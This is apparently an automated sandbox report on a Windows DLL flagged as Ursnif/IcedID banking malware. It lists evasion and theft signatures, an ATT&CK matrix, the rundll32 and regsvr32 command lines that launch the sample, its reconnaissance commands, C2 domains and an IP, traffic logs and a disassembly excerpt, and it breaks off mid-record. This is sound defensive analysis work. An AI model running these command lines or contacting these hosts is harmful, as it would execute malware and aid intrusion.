          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll64.exe TID: 2084Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
          Source: C:\Windows\System32\loaddll64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-4788
          Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-4958
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\loaddll64.exeAPI coverage: 7.5 %
          Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.5 %
          Source: C:\Windows\System32\rundll32.exeAPI coverage: 7.5 %
          Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
          Source: rundll32.exe, 00000004.00000002.765012505.000001C71475D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764834560.000001C71470B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 45.8.147.179 443Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDomain query: higmon.cyou
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1Jump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800045E8 GetSystemTimeAsFileTime,LeaveCriticalSection,0_2_00000001800045E8

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          111
          Process Injection
          11
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium12
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          111
          Process Injection
          LSASS Memory1
          Security Software Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Obfuscated Files or Information
          Security Account Manager11
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Regsvr32
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Rundll32
          LSA Secrets14
          System Information Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 753126 Sample: c2b80b8cbd660c3208162ed596e... Startdate: 24/11/2022 Architecture: WINDOWS Score: 80 33 Snort IDS alert for network traffic 2->33 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected Ursnif 2->39 9 loaddll64.exe 1 2->9         started        process3 process4 11 cmd.exe 1 9->11         started        13 regsvr32.exe 9->13         started        15 rundll32.exe 9->15         started        17 3 other processes 9->17 process5 19 rundll32.exe 11->19         started        dnsIp6 31 higmon.cyou 45.8.147.179, 443, 49708, 49719 VMAGE-ASRU Russian Federation 19->31 41 System process connects to network (likely due to code injection or exploit) 19->41 23 cmd.exe 1 19->23         started        25 cmd.exe 2 19->25         started        signatures7 process8 process9 27 conhost.exe 23->27         started        29 conhost.exe 25->29         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll22%ReversingLabsWin64.Trojan.IcedID
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://higmon.cyou/index.html7b9a100%Avira URL Cloudmalware
          https://http://Mozilla/5.00%Avira URL Cloudsafe
          https://higmon.cyouhttps://prises.cyouR0%Avira URL Cloudsafe
          https://higmon.cyou/index.html100%Avira URL Cloudmalware
          https://higmon.cyou100%Avira URL Cloudmalware
          https://higmon.cyou/100%Avira URL Cloudmalware
          https://prises.cyou100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          higmon.cyou
          45.8.147.179
          truetrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://higmon.cyou/index.html7b9arundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            https://my.tealiumiq.com/urest/legacy/tagcompanion/getProfile?utid=rundll32.exe, rundll32.exe, 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmp, c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dllfalse
              high
              https://higmon.cyou/index.htmlrundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://http://Mozilla/5.0loaddll64.exe, 00000000.00000002.265171862.000001FF43732000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246612763.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765260621.000001C716532000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247438709.000001817DA62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://higmon.cyouloaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://higmon.cyouhttps://prises.cyouRrundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://prises.cyouloaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://higmon.cyou/rundll32.exe, 00000004.00000002.764882863.000001C71471F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              45.8.147.179
              higmon.cyouRussian Federation
              44676VMAGE-ASRUtrue
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:753126
              Start date and time:2022-11-24 10:48:03 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 26s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe (renamed file extension from exe to dll)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:22
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal80.troj.evad.winDLL@20/1@1/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 28.5% (good quality ratio 19.5%)
              • Quality average: 40.1%
              • Quality standard deviation: 34.5%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 58
              • Number of non-executed functions: 184
              Cookbook Comments:
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • VT rate limit hit for: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
              TimeTypeDescription
              10:49:10API Interceptor1x Sleep call for process: loaddll64.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              45.8.147.179https://michaelpageuk5ukln.com/michael-pageGet hashmaliciousBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                higmon.cyouhttps://michaelpageuk5ukln.com/michael-pageGet hashmaliciousBrowse
                • 45.8.147.179
                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                VMAGE-ASRU73WTGbC71V.exeGet hashmaliciousBrowse
                • 45.8.144.232
                GpPP25HfBe.exeGet hashmaliciousBrowse
                • 45.8.145.101
                vhVK5w3w9z.exeGet hashmaliciousBrowse
                • 45.8.147.217
                6qC3krpy7W.exeGet hashmaliciousBrowse
                • 45.89.54.50
                tNID7H5KEX.exeGet hashmaliciousBrowse
                • 45.89.54.50
                SecuriteInfo.com.Trojan.NSISX.Spy.Gen.24.12780.9165.exeGet hashmaliciousBrowse
                • 5.182.38.12
                pPKkXryP9Z.exeGet hashmaliciousBrowse
                • 45.8.147.200
                Setup.exeGet hashmaliciousBrowse
                • 45.8.147.121
                ncvfa8g3DH.exeGet hashmaliciousBrowse
                • 45.8.144.183
                wOac7k4IQV.exeGet hashmaliciousBrowse
                • 5.182.37.34
                SlackSetup.imgGet hashmaliciousBrowse
                • 45.8.144.15
                Setup.exeGet hashmaliciousBrowse
                • 45.8.147.121
                THIN_MONKEY.exeGet hashmaliciousBrowse
                • 45.8.147.121
                Setup.exeGet hashmaliciousBrowse
                • 45.8.147.31
                b0AYw478Oz.exeGet hashmaliciousBrowse
                • 5.182.36.101
                L5AoXj4g4X.exeGet hashmaliciousBrowse
                • 5.182.36.101
                tkROtVzFhk.exeGet hashmaliciousBrowse
                • 45.159.248.118
                fHDSifQWY9.exeGet hashmaliciousBrowse
                • 45.89.55.178
                W4HI0bszxh.exeGet hashmaliciousBrowse
                • 45.8.146.34
                LybP12K1FE.exeGet hashmaliciousBrowse
                • 5.182.36.79
                No context
                No context
                Process:C:\Windows\System32\cmd.exe
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):1558
                Entropy (8bit):4.6826840372617475
                Encrypted:false
                SSDEEP:48:kv2LdasaxnvlFaPMapaIaGaeau7agOV2av6Y8ZtaLaK:YlH
                MD5:7BEC34850EB3436F93D778F9C7353D0E
                SHA1:85BF8EE675F70D906E56E33442726602BDDACC27
                SHA-256:B779CF426802A01B413615C45A7730427AFB336C9BE53BD5B59D07AC2CAA4ED6
                SHA-512:8D44C53446E02FB053B6BEEB424C6C93F436695C87BCAF3C29543C55FBF18DB6D045FC9D80E62A55E48BF346093C3C4B241DAFFD8BA22E1F57D32B58866EA4AC
                Malicious:false
                Preview:Commands .. Volume in drive C has no label... Volume Serial Number is C820-F8D1.... Directory of C:\Users\user\Desktop....11/24/2022 10:48 AM <DIR> ...11/24/2022 10:48 AM <DIR> ....08/16/2022 02:37 PM 1,026 BJZFPPWAPT.mp3..08/16/2022 02:37 PM 1,026 BJZFPPWAPT.pdf..11/24/2022 10:48 AM 538,624 c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll..08/16/2022 02:37 PM <DIR> DUUDTUBZFW..08/16/2022 02:37 PM 1,026 DUUDTUBZFW.jpg..08/16/2022 02:37 PM <DIR> EEGWXUHVUG..08/16/2022 02:37 PM 1,026 EEGWXUHVUG.docx..08/16/2022 02:37 PM 1,026 EEGWXUHVUG.xlsx..08/16/2022 02:37 PM 1,026 EFOYFBOLXA.jpg..08/16/2022 02:37 PM 1,026 EFOYFBOLXA.xlsx..08/16/2022 02:37 PM 1,026 EWZCVGNOWT.mp3..07/23/2020 10:38 AM 2,660 Excel 2016.lnk..08/16/2022 02:37 PM 1,026 GRXZDKKVDB.png..08/16/2022 02:37 PM
                File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Entropy (8bit):5.822863121964014
                TrID:
                • Win64 Dynamic Link Library (generic) (102004/3) 77.79%
                • Windows Screen Saver (13104/52) 9.99%
                • Win64 Executable (generic) (12005/4) 9.16%
                • Generic Win/DOS Executable (2004/3) 1.53%
                • DOS Executable Generic (2002/1) 1.53%
                File name:c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
                File size:538624
                MD5:590d96a7be55240ad868ebec78ce38f2
                SHA1:2aaf8acb010dfe83b808d7cc77f6821aaf44f3d2
                SHA256:846a8058cda54207aebb885f99dab0eab57529eb8dd94a3d57bbde2e93c4aad4
                SHA512:9360564b79909f934db9120315d981d3b2bf5e1f853baa0145d7ff9b0ac375d452d11d86f90dfe5547fdbd8f4f04a8f4fd2f73c50eab2df7bddb8207194d126a
                SSDEEP:6144:al+x6f16rj6MrQeQap0+TMPRxWer+YeZczE72q1i6qs6Yfs:a4416SCpXMPjWce+Eqq1i6qdas
                TLSH:D8B46D60B11030FFF6ABC039B1C66BD96279B113E9524DBEF05A98D48B8878B1177F19
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.}.1...1...1.......6...1...>.......0.......0.......0.......0...Rich1...........................PE..d.....2c.........." .......
                Icon Hash:74f0e4ecccdce0e4
                Entrypoint:0x180001000
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x180000000
                Subsystem:windows cui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x6332D8E8 [Tue Sep 27 11:05:12 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:16a8f4e2ed702e8523beef35ae5110a0
                Instruction
                jmp 00007FB3A0A0DDFCh
                mov eax, 00000001h
                add eax, 00000000h
                jmp 00007FB3A0A0DDE2h
                dec eax
                add esp, 18h
                ret
                dec eax
                mov dword ptr [esp+08h], ecx
                dec eax
                sub esp, 18h
                jmp 00007FB3A0A0DDEDh
                dec esp
                mov dword ptr [esp+18h], eax
                mov dword ptr [esp+10h], edx
                jmp 00007FB3A0A0DDCCh
                mov eax, dword ptr [esp+28h]
                mov dword ptr [esp], eax
                jmp 00007FB3A0A0DDB4h
                jmp 00007FB3A0A0DF88h
                mov byte ptr [esp+67h], 0000000Ah
                add byte ptr [esp+67h], 00000066h
                jmp 00007FB3A0A0DDFAh
                mov byte ptr [esp+64h], 00000012h
                add byte ptr [esp+64h], 00000026h
                jmp 00007FB3A0A0DE34h
                mov byte ptr [esp+66h], 0000000Dh
                add byte ptr [esp+66h], 00000062h
                jmp 00007FB3A0A0DDBEh
                mov byte ptr [esp+68h], 00000034h
                add byte ptr [esp+68h], 00000030h
                jmp 00007FB3A0A0DE04h
                add dx, 000Ah
                xor ecx, ecx
                jmp 00007FB3A0A0DFD3h
                mov byte ptr [esp+6Bh], 0000001Eh
                add byte ptr [esp+6Bh], 00000055h
                jmp 00007FB3A0A0DDE2h
                mov byte ptr [esp+6Ch], 00000000h
                mov dx, 0011h
                jmp 00007FB3A0A0DDC0h
                mov byte ptr [esp+69h], 00000032h
                add byte ptr [esp+69h], 00000047h
                jmp 00007FB3A0A0DDE2h
                mov byte ptr [esp+6Ah], 00000004h
                add byte ptr [esp+6Ah], 00000070h
                jmp 00007FB3A0A0DDB3h
                mov byte ptr [esp+65h], 00000041h
                add byte ptr [esp+65h], 0000002Bh
                jmp 00007FB3A0A0DD84h
                call 00007FB3A0A0DFD3h
                xor eax, eax
                jmp 00007FB3A0A0DEE0h
                call dword ptr [00000F5Bh]
                test eax, eax
                jne 00007FB3A0A0DDD1h
                jmp 00007FB3A0A0DF71h
                call dword ptr [00000000h]
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x20900x144.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0x21d40x50.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000x1e0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x90.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xfe00x1000False0.59130859375DOS executable (COM)5.742356131814896IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x20000x41a0x600False0.380859375COM executable for DOS3.47027698168912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .sedt0x30000x81ad60x81c00False0.3247832369942196data5.775703252117877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x850000x1e00x200False0.52734375data4.719348272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_MANIFEST0x850600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                DLLImport
                KERNEL32.dllVirtualAlloc, GetConsoleMode, PeekConsoleInputA, ReadConsoleA, FlushConsoleInputBuffer, GetConsoleScreenBufferInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, ReadConsoleOutputA, GetCurrentConsoleFont
                USER32.dllGetScrollBarInfo, DefMDIChildProcW
                USP10.dllScriptXtoCP, ScriptString_pSize, ScriptTextOut
                NameOrdinalAddress
                DllRegisterServer10x180001030
                FgnfMvSNFULXZx20x180001e60
                KVpawdrrKTUjeZuk30x180001e3c
                LaEiyoOgoiNTr40x180001f5c
                WOlqmpYHUmo50x180001e84
                XEuCWLzwGSc60x180001ea8
                ZdXkUtuwLqhmt70x180001f38
                aLcPpKozZItuf80x180001f14
                cNtNVfZnIZvqyMq90x180001ecc
                hbOIyYikdaBLyqU100x180001ef0
                zJhDuUvYOmGa110x180001e18
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.78.8.8.860326532039637 11/24/22-10:49:03.324067UDP2039637ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou)6032653192.168.2.78.8.8.8
                TimestampSource PortDest PortSource IPDest IP
                Nov 24, 2022 10:49:03.362545013 CET49708443192.168.2.745.8.147.179
                Nov 24, 2022 10:49:03.362597942 CET4434970845.8.147.179192.168.2.7
                Nov 24, 2022 10:49:03.362678051 CET49708443192.168.2.745.8.147.179
                Nov 24, 2022 10:49:03.368077993 CET49708443192.168.2.745.8.147.179
                Nov 24, 2022 10:49:03.368100882 CET4434970845.8.147.179192.168.2.7
                Nov 24, 2022 10:51:14.267262936 CET4434970845.8.147.179192.168.2.7
                Nov 24, 2022 10:51:14.270287037 CET49719443192.168.2.745.8.147.179
                Nov 24, 2022 10:51:14.270345926 CET4434971945.8.147.179192.168.2.7
                Nov 24, 2022 10:51:14.270559072 CET49719443192.168.2.745.8.147.179
                Nov 24, 2022 10:51:14.272161007 CET49719443192.168.2.745.8.147.179
                Nov 24, 2022 10:51:14.272178888 CET4434971945.8.147.179192.168.2.7
                TimestampSource PortDest PortSource IPDest IP
                Nov 24, 2022 10:49:03.324067116 CET6032653192.168.2.78.8.8.8
                Nov 24, 2022 10:49:03.342747927 CET53603268.8.8.8192.168.2.7
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 24, 2022 10:49:03.324067116 CET192.168.2.78.8.8.80xe611Standard query (0)higmon.cyouA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 24, 2022 10:49:03.342747927 CET8.8.8.8192.168.2.70xe611No error (0)higmon.cyou45.8.147.179A (IP address)IN (0x0001)false

                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:10:49:00
                Start date:24/11/2022
                Path:C:\Windows\System32\loaddll64.exe
                Wow64 process (32bit):false
                Commandline:loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll"
                Imagebase:0x7ff6962f0000
                File size:139776 bytes
                MD5 hash:C676FC0263EDD17D4CE7D644B8F3FCD6
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:1
                Start time:10:49:00
                Start date:24/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:10:49:00
                Start date:24/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
                Imagebase:0x7ff7651b0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:10:49:00
                Start date:24/11/2022
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
                Imagebase:0x7ff7ccb40000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:4
                Start time:10:49:00
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
                Imagebase:0x7ff739200000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:5
                Start time:10:49:00
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer
                Imagebase:0x7ff739200000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:6
                Start time:10:49:03
                Start date:24/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
                Imagebase:0x7ff7651b0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:7
                Start time:10:49:03
                Start date:24/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:8
                Start time:10:49:03
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx
                Imagebase:0x7ff739200000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:9
                Start time:10:49:04
                Start date:24/11/2022
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
                Imagebase:0x7ff7651b0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:10
                Start time:10:49:04
                Start date:24/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6edaf0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
